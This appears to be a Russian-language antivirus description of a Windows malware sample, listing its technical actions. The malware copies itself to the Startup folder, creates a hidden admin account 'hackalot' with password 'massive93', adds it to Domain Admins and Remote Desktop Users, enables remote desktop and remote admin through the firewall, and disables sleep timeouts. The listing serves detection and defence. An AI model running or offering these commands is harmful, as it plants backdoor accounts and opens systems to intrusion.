Техническая информация
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\<Имя вируса>.exe
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\<Имя вируса>.exe
- <SYSTEM32>\powercfg.exe -change Security -standby-timeout-ac 0
- <SYSTEM32>\powercfg.exe -change Security -standby-timeout-dc 0
- <SYSTEM32>\powercfg.exe -change Security -disk-timeout-ac 0
- <SYSTEM32>\powercfg.exe -change Security -disk-timeout-dc 0
- <SYSTEM32>\powercfg.exe -change Security -hibernate-timeout-ac 0
- <SYSTEM32>\netsh.exe firewall Set service REMOTEDESKTOP ENABLE
- <SYSTEM32>\netsh.exe firewall set service REMOTEAdmin ENABLE
- <SYSTEM32>\powercfg.exe -change Security -hibernate-timeout-dc 0
- <SYSTEM32>\powercfg.exe -setactive Security
- <SYSTEM32>\net1.exe group "Domain Admins "hackalot /add
- <SYSTEM32>\net1.exe localgroup %USERNAME%s hackalot /add
- <SYSTEM32>\net1.exe user hackalot massive93 /add
- <SYSTEM32>\net1.exe localgroup %USERNAME% hackalot /add
- <SYSTEM32>\net1.exe localgroup %USERNAME%s %userdomain%\hackalot /add
- <SYSTEM32>\powercfg.exe -change Security -monitor-timeout-ac 0
- <SYSTEM32>\powercfg.exe -change Security -monitor-timeout-dc 0
- <SYSTEM32>\net1.exe localgroup "Remote Desktop Users "hackalot /add
- <SYSTEM32>\powercfg.exe -create Security